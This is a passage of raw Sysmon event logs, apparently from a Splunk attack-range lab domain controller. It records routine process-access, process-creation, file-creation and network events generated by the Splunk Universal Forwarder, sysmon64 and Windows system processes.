Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18AF-6216-4F07-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-18AF-6216-4F07-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.209{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18AF-6216-4F07-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:19.210{C8EA50B7-18AF-6216-4F07-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:20.888{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3E9C018609603F0F5D1902EF99C9ADE,SHA256=95B38F869ACB3B2D18F5A71C22C106F30FDF4344FA1639825A91B0B0B8102670,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.856{C8EA50B7-18B0-6216-5107-000000003802}66125232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.640{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FCC83D26E99E446643D9FD9E529C0F,SHA256=9F8373006385E24C9B555F4C84E9577056C5785911C10D5AF8AE852BBD62462F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18B0-6216-5107-000000003802}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-18B0-6216-5107-000000003802}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.571{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18B0-6216-5107-000000003802}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.573{C8EA50B7-18B0-6216-5107-000000003802}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.325{C8EA50B7-18B0-6216-5007-000000003802}16405892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.071{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18B0-6216-5007-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000298338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:17.673{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49522-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000298337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-18B0-6216-5007-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.055{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18B0-6216-5007-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:20.057{C8EA50B7-18B0-6216-5007-000000003802}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 